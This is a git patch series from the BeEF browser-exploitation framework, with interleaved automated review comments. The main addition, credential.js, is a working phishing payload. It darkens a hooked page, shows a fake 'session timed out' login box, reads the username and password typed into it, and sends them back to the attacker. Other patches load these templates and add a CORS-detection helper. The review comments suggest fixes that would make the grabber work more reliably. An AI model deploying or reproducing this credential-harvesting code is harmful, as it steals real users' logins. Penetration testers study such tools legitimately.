b/modules/social_engineering/simple_hijacker/templates/credential.js 
@@ -0,0 +1,105 @@
+ imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
+ var answer= '';
+
+ beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+ $j(document).attr('title', $j(this).html());
+ document.body.scroll = 'no';
+ document.documentElement.style.overflow = 'hidden';
+
+ // set up darkening
+ function grayOut(vis, options) {
+ // Pass true to gray out screen, false to ungray
+ // options are optional. This is a JSON object with the following (optional) properties
+ // opacity:0-100 // Lower number = less grayout higher = more of a blackout
+ // zindex: # // HTML elements with a higher zindex appear on top of the gray out
+ // bgcolor: (#xxxxxx) // Standard RGB Hex color code
+ // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
+ // Because options is JSON opacity/zindex/bgcolor are all optional and can appear
+ // in any order. Pass only the properties you need to set.
+ var options = options || {};
+ var zindex = options.zindex || 50;
+ var opacity = options.opacity || 70;
+ var opaque = (opacity / 100);
+ var bgcolor = options.bgcolor || '#000000';
+ var dark=document.getElementById('darkenScreenObject');
+ if (!dark) {
+ // The dark layer doesn't exist, it's never been created. So we'll
+ // create it here and apply some basic styles.
+ // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+ var tbody = document.getElementsByTagName("body")[0];
+ var tnode = document.createElement('div'); // Create the layer.
+ tnode.style.position='absolute'; // Position absolutely
+ tnode.style.top='0px'; // In the top
+ tnode.style.left='0px'; // Left corner of the page
+ tnode.style.overflow='hidden'; // Try to avoid making scroll bars
+ tnode.style.display='none'; // Start out Hidden
+ tnode.id='darkenScreenObject'; // Name it so we can find it later
+ tbody.appendChild(tnode); // Add it to the web page
+ dark=document.getElementById('darkenScreenObject'); // Get the object.
+ }
+ if (vis) {
+ // Calculate the page width and height
+ if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+ var pageWidth = document.body.scrollWidth+'px';
+ var pageHeight = document.body.scrollHeight+'px';
+ } else if( document.body.offsetWidth ) {
+ var pageWidth = document.body.offsetWidth+'px';
+ var pageHeight = document.body.offsetHeight+'px';
+ } else {
+ var pageWidth='100%';
+ var pageHeight='100%';
+ }
+ //set the shader to cover the entire page and make it visible.
+ dark.style.opacity=opaque;
+ dark.style.MozOpacity=opaque;
+ dark.style.filter='alpha(opacity='+opacity+')';
+ dark.style.zIndex=zindex;
+ dark.style.backgroundColor=bgcolor;
+ dark.style.width= pageWidth;
+ dark.style.height= pageHeight;
+ dark.style.display='block';
+ } else {
+ dark.style.display='none';
+ }
+ }
+
+ // function to send response
+ function win(){
+ document.getElementById('hax').innerHtml='

Thank you for re-authenticating, you will now be returned to the application

';
+ answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
+ }
+
+ // perform darkening
+ grayOut(true);
+
+ function checker(){
+ processval = document.body.lastChild.getElementsByTagName("input")[2].value;
+ if (processval == "Processing..") {
+ uname = document.body.lastChild.getElementsByTagName("input")[0].value;
+ pass = document.body.lastChild.getElementsByTagName("input")[1].value;
+ answer = uname+":"+pass + send(answer);
+ // set lastchild invisible
+ document.body.lastChild.setAttribute('style','display:none');
+ // lighten screen
+ grayOut(false);
+ clearInterval(credgrabber);
+ $j('#hax').remove();
+ $j('#darkenScreenObject').remove();
+ }
+ }
+
+
+ // floating div
+ function writeit() {
+ sneakydiv = document.createElement('div');
+ sneakydiv.setAttribute('id', 'hax');
+ sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
+ sneakydiv.setAttribute('align', 'center');
+ document.body.appendChild(sneakydiv);
+ sneakydiv.innerHTML= '

Your session has timed out!

For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.

Username:
Password:

';
+ credgrabber = setInterval(checker,1000);
+
+ }
+
+ writeit();
From 716e7fe712ba6868d2df56d88e7e2bba441a8948 Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen
Date: Wed, 5 Sep 2012 15:15:56 +0200
Subject: [PATCH 7/8] Change stupid code that made this module unusable with the API to something less stupid (i hope)
---
 modules/social_engineering/simple_hijacker/command.js | 8 +++++++-
 modules/social_engineering/simple_hijacker/module.rb | 2 --
 2 files changed, 7 insertions(+), 3 deletions(-)
diff --git a/modules/social_engineering/simple_hijacker/command.js b/modules/social_engineering/simple_hijacker/command.js
index adcc3e4b2..e924ebb41 100644
--- a/modules/social_engineering/simple_hijacker/command.js
+++ b/modules/social_engineering/simple_hijacker/command.js
@@ -24,7 +24,13 @@ hijack = function(){
 if ($j(this).attr('href') != '') {
 if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{
- <%= instance_variable_get("@#{@choosetmpl}") %>
+ <%
+ tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js"
+ file = File.open(tplpath, "r")
+ @template = file.read
+ %>
+
+ <%= @template %>
 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
 }
 }
diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb
index d9a66c1dd..6a40a85ed 100644
--- a/modules/social_engineering/simple_hijacker/module.rb
+++ b/modules/social_engineering/simple_hijacker/module.rb
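Review bot: In `checker()` the statement `answer = uname+":"+pass` has no terminating semicolon and is immediately followed by `+ send(answer);`, so JavaScript does not insert a semicolon there and the two parse as a single expression, `answer = uname + ":" + pass + send(answer)`; `send` is therefore evaluated with the previous value of `answer` (still the initial `''`, because `win()` is never invoked) before the assignment completes, and `send`'s return value is appended to `answer`. The collapsed rendering of this hunk does not show whether `+ send(answer)` sits on its own line, but the parse is the same either way; ending the first statement with `;` — `answer = uname + ":" + pass;` — fixes it. Separately, `win()` assigns `innerHtml` rather than `innerHTML`, which only creates an expando property and never updates the element, and `win()` has no caller in this hunk, so it should either be called from `checker()` with the property name corrected or removed. The `imgr` URL is also hard-coded to `http://0.0.0.0:3000`, which ties the template to a default local install; a comment stating that assumption, or deriving the base from the module's own configuration, would make that explicit.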
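Review bot: The new ERB block opens the template with `File.open(tplpath, "r")` and never closes the handle, so every rendering of this command leaks a file descriptor until the object is finalised; `@template = File.read(tplpath)` reads and closes in one call and replaces both the `file =` and `@template = file.read` lines. `@choosetmpl` is interpolated straight into the filesystem path here, and this hunk shows no check of it against the `@templates` list that module.rb builds (if that check exists elsewhere it is not visible); guarding the read with `raise "Unknown template #{@choosetmpl}" unless @templates.include?(@choosetmpl)` keeps the path inside the templates directory. Doing this lookup in module.rb rather than inside the JS template would also keep the ERB free of Ruby I/O. The body of `hijack` starts and ends outside the hunk.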
@@ -29,8 +29,6 @@ class Simple_hijacker < BeEF::Core::Command
 @templates.each{ |template|
 tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
 raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
- file = File.open(tplpath, "r")
- data.push({'name' => template, 'type' => 'hidden', 'value' => file.read})
 tmptpl<<[ template]
 }
From 085f2775f37e81e62e4448e4a45ab4020baacf9d Mon Sep 17 00:00:00 2001
From: bcoles
Date: Thu, 6 Sep 2012 17:50:27 +0930
Subject: [PATCH 8/8] Added `beef.browser.hasCors()` function
---
 core/main/client/browser.js | 19 +++++++++++++++++--
 1 file changed, 17 insertions(+), 2 deletions(-)
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 42bfcaca0..519285a08 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -605,8 +605,8 @@ beef.browser = {
 * Checks if the Phonegap API is available from the hooked domain.
 * @return: {Boolean} true or false.
 *
- * @example: if(beef.browser.hasJava()) { ... }
- */
+ * @example: if(beef.browser.hasPhonegap()) { ... }
+ */
 hasPhonegap: function() {
 var result = false;
 try { if (!!device.phonegap) result = true; else result = false; }
@@ -614,6 +614,21 @@ beef.browser = {
 return result;
 },
+ /**
+ * Checks if the browser supports CORS
+ * @return: {Boolean} true or false.
+ *
+ * @example: if(beef.browser.hasCors()) { ... }
+ */
+ hasCors: function() {
+ if ('withCredentials' in new XMLHttpRequest())
+ return true;
+ else if (typeof XDomainRequest !== "undefined")
+ return true;
+ else
+ return false;
+ },
+ /**
+ * Checks if the zombie has Java installed and enabled.
+ * @return: {Boolean} true or false.
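Review bot: `hasCors()` calls `new XMLHttpRequest()` unguarded, so in a browser that lacks that constructor the probe throws instead of returning false, whereas the neighbouring `hasPhonegap()` wraps its probe in `try`/`catch`; the same guard would make the two consistent with each other and with the documented "true or false" contract. The three-branch `if`/`else if`/`else` also collapses to one expression: `try { return ('withCredentials' in new XMLHttpRequest()) || typeof XDomainRequest !== "undefined"; } catch (e) { return false; }`. Because `XDomainRequest` (IE 8/9) implements only a restricted subset of CORS — no cookies or custom request headers — the doc comment should say so, e.g. `* Note: on IE 8/9 a true result means XDomainRequest, a limited CORS subset.`, so callers do not assume credentialed requests will work.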